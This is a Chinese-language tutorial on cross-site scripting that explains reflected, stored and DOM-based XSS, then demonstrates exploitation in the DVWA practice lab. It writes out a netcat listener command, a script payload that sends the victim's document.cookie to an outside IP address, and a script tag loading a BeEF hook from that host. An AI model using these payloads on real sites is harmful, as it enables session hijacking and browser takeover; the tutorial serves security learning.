xss跨站脚本攻击

xss跨站脚本攻击

一.xss简介

跨站脚本(Cross-site scripting,简称为:CSS, 但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,跨站脚本攻击缩写为XSS)是一种网站应用程序的安全漏洞攻击。

XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、 LiveScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。




二.xss类型

最常见的几种分类:反射型(非持久型)XSS、存储型(持久型)XSS、DOM型XSS、通用型XSS、突变型XSS。

反射型

反射型XSS只是简单的把用户输入的数据从服务器反射给用户浏览器,要利用这个漏洞,攻击者必须以某种方式诱导用户访问一个精心设计的URL(恶意链接),才能实施攻击。

漏洞成因

当用户的输入或者一些用户可控参数未经处理地输出到页面上,就容易产生XSS漏洞

攻击流程

反射型XSS通常出现在搜索等功能中,需要被攻击者点击对应的链接才能触发,且受到XSS Auditor(chrome内置的XSS保护)、NoScript等防御手段的影响较大,所以它的危害性较存储型要小。

实例解析


存储型

存储型(或 HTML 注入型/持久型)XSS 攻击最常发生在由社区内容驱动的网站或 Web 邮件网站,不需要特制的链接来执行。黑客仅仅需要提交 XSS 漏洞利用代码(反射型XSS通常只在url中)到一个网站上其他用户可能访问的地方。这些地区可能是博客评论,用户评论,留言板,聊天室,HTML 电子邮件,wikis,和其他的许多地方。一旦用户访问受感染的页,执行是自动的。

漏洞成因

存储型XSS漏洞的成因与反射型的根源类似,不同的是恶意代码会被保存在服务器中,导致其它用户(前端)和管理员(前后端)在访问资源时执行了恶意代码,用户访问服务器-跨站链接-返回跨站代码。

攻击流程

实例解析




DOM型XSS

通过修改页面的DOM节点形成的XSS,称之为DOM Based XSS。

漏洞成因

DOM型XSS是基于DOM文档对象模型的。对于浏览器来说,DOM文档就是一份XML文档,当有了这个标准的技术之后,通过JavaScript就可以轻松的访问DOM。当确认客户端代码中有DOM型XSS漏洞时,诱使(钓鱼)一名用户访问自己构造的URL,利用步骤和反射型很类似,但是唯一的区别就是,构造的URL参数不用发送到服务器端,可以达到绕过WAF、躲避服务端的检测效果。

其他xss


三.xss利用



在这里我们可以使用dvwa靶场进行尝试

我们首先打开vps,随便监听一个端口

javascript 复制代码
nc  -kvvl  0.0.0.0 456

这里为什么不监听127.0.0.1呢,而是0.0.0.0

"nc 0.0.0.0 456" 和 "nc 127.0.0.1 456" 在功能上有一些不同。

"nc 0.0.0.0 456" 命令会使 netcat 工具在本地所有可用接口的456端口上监听连接。这意味着无论是从本地机器还是从其他计算机上尝试连接到该IP地址和端口,都将被接受。

而 "nc 127.0.0.1 456" 命令会使 netcat 工具在本地回环地址(即 localhost 或本地主机)上的456端口上监听连接。这意味着只有在同一台计算机上的进程尝试连接到该IP地址和端口时,连接才会被接受。

换句话说,"nc 0.0.0.0 456" 允许来自本地和外部网络的连接,而 "nc 127.0.0.1 456" 只允许来自同一台计算机的连接。

然后我们在dvwa靶场先把等级调成low

找到xss的反射型

输入我们的js命令

javascript 复制代码
<script>window.location.href="http://119.3.213.143:456/?cookie="+document.cookie</script>

之后我们的服务器上就会出现如下cookie数据,表示我们截取cookie成功














beef平台实操

beef安装教程我放这里了
https://mambainveins.gitee.io/mambainveins/2020/07/06/2020-07-06-docker_beef/

我们登陆beef后

就如同上面讲的那样,点击hook me

点击以后,我们就与这个网站产生了联系

之后我们构造js插入到dvwa靶场试一下

javascript 复制代码
<script src="http://119.3.213.143:30000/hook.js"></script>
相关推荐
崔庆才丨静觅8 小时前
hCaptcha 验证码图像识别 API 对接教程
前端
passerby60618 小时前
完成前端时间处理的另一块版图
前端·github·web components
掘了9 小时前
「2025 年终总结」在所有失去的人中,我最怀念我自己
前端·后端·年终总结
崔庆才丨静觅9 小时前
实用免费的 Short URL 短链接 API 对接说明
前端
崔庆才丨静觅9 小时前
5分钟快速搭建 AI 平台并用它赚钱!
前端
崔庆才丨静觅9 小时前
比官方便宜一半以上!Midjourney API 申请及使用
前端
Moment9 小时前
富文本编辑器在 AI 时代为什么这么受欢迎
前端·javascript·后端
崔庆才丨静觅10 小时前
刷屏全网的“nano-banana”API接入指南!0.1元/张量产高清创意图,开发者必藏
前端
剪刀石头布啊10 小时前
jwt介绍
前端
爱敲代码的小鱼10 小时前
AJAX(异步交互的技术来实现从服务端中获取数据):
前端·javascript·ajax